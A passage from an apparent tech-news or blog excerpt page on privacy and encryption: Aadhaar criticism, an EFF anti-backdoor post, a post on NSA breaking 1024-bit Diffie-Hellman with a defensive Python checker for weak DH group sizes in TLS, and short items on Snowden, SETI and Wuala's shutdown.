By making Aadhaar mandatory, UIDAI has taken away individuals’ right to exit these unsatisfactory arrangements. The coercive measures the State has taken to drive adoption of Aadhaar have introduced new risks to individuals’ data and to national security. Even the efficiency argument has fallen flat, negated by the unreliability of Aadhaar authentication. The tragedy of Aadhaar is that it not only fails to deliver efficiency and justice but also introduces significant economic and social costs.

All in all, it is hard to see how this mess can be fixed without scrapping the system and—perhaps—starting again from scratch. As drastic as that sounds, the current Supreme Court challenge may, ironically, provide a golden opportunity to revamp the fatally flawed institutional arrangements behind Aadhaar, and give the Indian government a fresh chance to learn from the mistakes that brought it to this point.

Crypto is For Everyone—and American History Proves It

Over the last year, law enforcement officials around the world have been pressing hard on the notion that without a magical “backdoor” to access the content of any and all encrypted communications by ordinary people, they’ll be totally incapable of fulfilling their duties to investigate crime and protect the public. EFF and many others have pushed back—including launching a petition with our friends to SaveCrypto, which this week reached 100,000 signatures, forcing a response from President Obama.

Read more…

How to Protect Yourself from the NSA If You Use 1024-bit DH Encryption

In a post on Wednesday, researchers Alex Halderman and Nadia Heninger presented compelling research suggesting that the NSA has developed the capability to decrypt a large number of HTTPS, SSH, and VPN connections using an attack on common implementations of the Diffie-Hellman key exchange with 1024-bit primes. Earlier in the year, they were part of a research group that published a study of the Logjam attack, which leveraged overlooked and outdated code to force “export-grade” (downgraded, 512-bit) parameters for Diffie-Hellman. By performing a cost analysis of the attack against the stronger 1024-bit parameters and comparing that with what we know of the NSA “black budget” (and reading between the lines of several leaked documents about NSA interception capabilities), they concluded that the NSA has likely been breaking 1024-bit Diffie-Hellman for some time now.
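Both the Logjam downgrade and the 1024-bit precomputation attack hinge on a parameter the client can see in the clear: the size of the prime the server sends in its DHE ServerKeyExchange message. The following is an added Python example, not code from the researchers or from the original post, that parses the ServerDHParams structure (RFC 5246, section 7.4.3) and classifies the group by size, which is the check a hardened client or a passive monitor applies. It assumes the TLS record and handshake headers have already been stripped, and the sample messages are constructed, not captured traffic.

```python
import struct


def _read_opaque16(buf: bytes, off: int):
    """Read one opaque<1..2^16-1> field; return (value, offset after it)."""
    if off + 2 > len(buf):
        raise ValueError("truncated length field")
    (n,) = struct.unpack_from("!H", buf, off)
    off += 2
    if n == 0 or off + n > len(buf):
        raise ValueError("bad field length")
    return buf[off:off + n], off + n


def parse_server_dh_params(body: bytes):
    """Parse ServerDHParams {dh_p, dh_g, dh_Ys} from the body of a DHE
    ServerKeyExchange message. Record-layer and handshake headers are assumed
    to have been removed already. Returns (p, g, Ys, trailing bytes); the
    trailing bytes are the server's signature over the parameters."""
    p_raw, off = _read_opaque16(body, 0)
    g_raw, off = _read_opaque16(body, off)
    ys_raw, off = _read_opaque16(body, off)
    return (int.from_bytes(p_raw, "big"), int.from_bytes(g_raw, "big"),
            int.from_bytes(ys_raw, "big"), body[off:])


def classify_dh_group(p: int) -> str:
    """Size-based verdict. 'export' is the 512-bit size Logjam downgrades to;
    'weak' is the 1024-bit size the researchers estimate a nation-state can
    precompute; anything under 2048 bits is 'marginal'."""
    bits = p.bit_length()
    if bits <= 512:
        return "export"
    if bits <= 1024:
        return "weak"
    if bits < 2048:
        return "marginal"
    return "ok"


def audit_server_key_exchange(body: bytes) -> dict:
    """What a client or passive monitor can decide from the server's parameters."""
    p, g, ys, _signature = parse_server_dh_params(body)
    return {
        "p_bits": p.bit_length(),
        "g": g,
        "verdict": classify_dh_group(p),
        "ys_in_range": 1 < ys < p - 1,  # reject degenerate public values
    }


def build_server_dh_params(p: int, g: int, ys: int) -> bytes:
    """Encoder for the same structure; used to construct the samples below."""
    out = b""
    for v in (p, g, ys):
        raw = v.to_bytes((v.bit_length() + 7) // 8, "big")
        out += struct.pack("!H", len(raw)) + raw
    return out


# Constructed sample messages, not captured traffic. Odd numbers of the target
# bit lengths stand in for primes; only the size matters to the size check.
SAMPLE_MESSAGES = {
    "export-grade": build_server_dh_params((1 << 511) + 1, 2, 0x42),
    "default-1024": build_server_dh_params((1 << 1023) + 1, 2, 0x42),
    "modern-2048": build_server_dh_params((1 << 2047) + 1, 2, 0x42),
}


if __name__ == "__main__":
    for label, msg in SAMPLE_MESSAGES.items():
        print(label, audit_server_key_exchange(msg))
```

A client that refuses to continue on anything but "ok" is immune to the Logjam downgrade regardless of which cipher suites the server still advertises, and a monitor that logs the verdict per connection will surface every server still on a 1024-bit group. The size check is only half of what the research recommends: the precomputation attack is cheapest against primes shared by many servers, so a second check, matching p against a list of known widely deployed groups, is worth adding where such a list is available (none is included here). On the server side the fix is to prefer ECDHE or to generate a fresh 2048-bit group rather than ship a default one.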

Read more…

SETI: Snowden Should Stick to Human Affairs and Let Us Figure out How to Find Aliens

Edward Snowden may know a thing or two about encryption, but his remarks on encrypted alien signals aren’t sitting quite right with SETI. According to those in the business of searching for extraterrestrials, Snowden should probably keep his security advice limited to human affairs.

Read more…

Edward Snowden: Advanced Encryption May Stop Us Communicating With Aliens

On Friday, Neil deGrasse Tyson welcomed Edward Snowden to his StarTalk podcast. Along with the usual conversations about privacy and government, Snowden had another important warning to provide: encryption may hurt our abilities to see, or be seen by, extraterrestrials.

Read more…

Encrypted cloud storage service Wuala announced today they’re shutting down, going read-only on Sept

Encrypted cloud storage service Wuala announced today they’re shutting down, going read-only on September 30th and purging data on November 15th. Wuala was one of our favorite secure cloud storage services, but they recommend another of our faves, Tresorit. You can read more here.

Read more…
